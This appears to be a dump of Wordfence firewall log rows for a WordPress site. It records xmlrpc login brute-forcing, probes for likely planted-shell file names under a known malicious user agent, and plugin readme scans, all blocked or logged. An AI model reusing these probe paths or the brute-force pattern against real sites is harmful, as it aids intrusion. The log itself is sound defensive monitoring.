(51115, 0.000000, 1712319197.264966, '\0\0\0\0\0\0\0\0\0\0ÿÿl²«ú', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51116, 0.000000, 1712319201.939479, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\c\r', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51117, 0.000000, 1712319205.119566, '\0\0\0\0\0\0\0\0\0\0ÿÿÊ¤¶2', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51118, 0.000000, 1712319205.821788, '\0\0\0\0\0\0\0\0\0\0ÿÿ·R!Z', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51119, 0.000000, 1712319210.145900, '\0\0\0\0\0\0\0\0\0\0ÿÿ¥3g', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51120, 0.000000, 1712319210.064761, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹Û•', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51121, 0.000000, 1712319212.228211, '\0\0\0\0\0\0\0\0\0\0ÿÿu×¢', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51122, 0.000000, 1712319214.625742, '\0\0\0\0\0\0\0\0\0\0ÿÿg²>ô', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51123, 0.000000, 1712319217.020224, '\0\0\0\0\0\0\0\0\0\0ÿÿ[–kC', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51124, 0.000000, 1712319217.274878, '\0\0\0\0\0\0\0\0\0\0ÿÿ±&Vþ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51125, 0.000000, 1712319229.269680, '\0\0\0\0\0\0\0\0\0\0ÿÿgd¯', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51126, 0.000000, 1712319235.666754, '\0\0\0\0\0\0\0\0\0\0ÿÿ1%Õ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51127, 0.000000, 1712319237.022201, '\0\0\0\0\0\0\0\0\0\0ÿÿWîÕl', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51128, 0.000000, 1712319238.733278, '\0\0\0\0\0\0\0\0\0\0ÿÿsaï¼', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51129, 0.000000, 1712319240.448656, '\0\0\0\0\0\0\0\0\0\0ÿÿV~•Û', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51130, 0.000000, 1712319244.217642, '\0\0\0\0\0\0\0\0\0\0ÿÿgY@ñ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51131, 0.000000, 1712319251.533236, '\0\0\0\0\0\0\0\0\0\0ÿÿ—7ÉÄ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51132, 0.000000, 1712319251.626280, '\0\0\0\0\0\0\0\0\0\0ÿÿ1/ðè', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(50983, 1712208264.516090, 1712208264.114400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/mini.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21pbmkucGhw","category":"brute-force","ssl":1}'),
(51579, 1712338347.407544, 1712338347.149100, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/old/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L29sZC93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L29sZC93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(51636, 1712367542.117287, 1712367541.780400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/backup-backup/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; HD1913) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 EdgA/120.0.2210.157', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51666, 1712367976.258824, 1712367975.981900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/viral-optins/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/90.0.4427.0 Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy92aXJhbC1vcHRpbnMvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy92aXJhbC1vcHRpbnMvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51667, 1712367971.865791, 1712367971.562000, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/userpro/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3; rv:75.0) Gecko/20100101 Firefox/75.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy91c2VycHJvL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy91c2VycHJvL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51668, 1712367971.865464, 1712367971.562000, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/userpro/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3; rv:75.0) Gecko/20100101 Firefox/75.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy91c2VycHJvL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy91c2VycHJvL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51672, 1712367985.069664, 1712367984.750900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/zen-mobile-app-native/readme.txt', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/122.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy96ZW4tbW9iaWxlLWFwcC1uYXRpdmUvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy96ZW4tbW9iaWxlLWFwcC1uYXRpdmUvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51629, 1712367537.388771, 1712367537.010300, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-agora-io/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/107.2 Mobile/15E148 Safari/605.1.15', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1hZ29yYS1pby9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1hZ29yYS1pby9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51630, 1712367533.673110, 1712367533.250800, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/ai-engine/readme.txt', NULL, 'Mozilla/5.0 (Android 14; Mobile; LG-M255; rv:122.0) Gecko/122.0 Firefox/122.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9haS1lbmdpbmUvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9haS1lbmdpbmUvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51671, 1712367985.069899, 1712367984.750900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/zen-mobile-app-native/readme.txt', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/122.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy96ZW4tbW9iaWxlLWFwcC1uYXRpdmUvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy96ZW4tbW9iaWxlLWFwcC1uYXRpdmUvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51631, 1712367533.672844, 1712367533.250800, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/ai-engine/readme.txt', NULL, 'Mozilla/5.0 (Android 14; Mobile; LG-M255; rv:122.0) Gecko/122.0 Firefox/122.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9haS1lbmdpbmUvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9haS1lbmdpbmUvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50446, 1711359191.754847, 1711359191.327100, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/class.api.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NsYXNzLmFwaS5waHA=","category":"brute-force","ssl":1}'),
(50447, 1711359187.708819, 1711359187.297300, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-admin/css/colors/coffee/index.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWFkbWluL2Nzcy9jb2xvcnMvY29mZmVlL2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50414, 1711262398.279075, 1711262397.971400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ/', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50425, 1711358563.166501, 1711358562.862900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/wp.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLnBocA==","category":"brute-force","ssl":1}'),
(50415, 1711262389.510642, 1711262389.167600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ/', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/style.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3N0eWxlLnBocA==","category":"brute-force","ssl":1}'),
(50320, 0.000000, 1711082119.861885, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50321, 0.000000, 1711082856.512324, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50322, 0.000000, 1711083590.343611, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50323, 0.000000, 1711084323.770477, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50319, 0.000000, 1711081375.608486, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50416, 1711262372.033517, 1711262371.693200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ/', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/chosen.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nob3Nlbi5waHA=","category":"brute-force","ssl":1}'),
(50412, 1711258342.741132, 1711258342.365200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ/', 0, 403, 0, 0, 0, 'https://mail.happythinking.com/chosen.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nob3Nlbi5waHA=","category":"brute-force","ssl":1}'),
(50424, 1711358574.200792, 1711358573.865500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-conflg.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbmZsZy5waHA=","category":"brute-force","ssl":1}'),
(50413, 1711258316.730319, 1711258316.288500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ/', 0, 403, 0, 0, 0, 'https://mail.happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50967, 1712207546.945455, 1712207546.405500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/cloud.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nsb3VkLnBocA==","category":"brute-force","ssl":1}'),
(51995, 1712689371.634808, 1712689371.278100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/x.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3gucGhw","category":"brute-force","ssl":1}'),
(50910, 1712082574.681706, 1712082573.753300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-login.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(50911, 1712082564.508270, 1712082563.773000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/install.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luc3RhbGwucGhw","category":"brute-force","ssl":1}'),
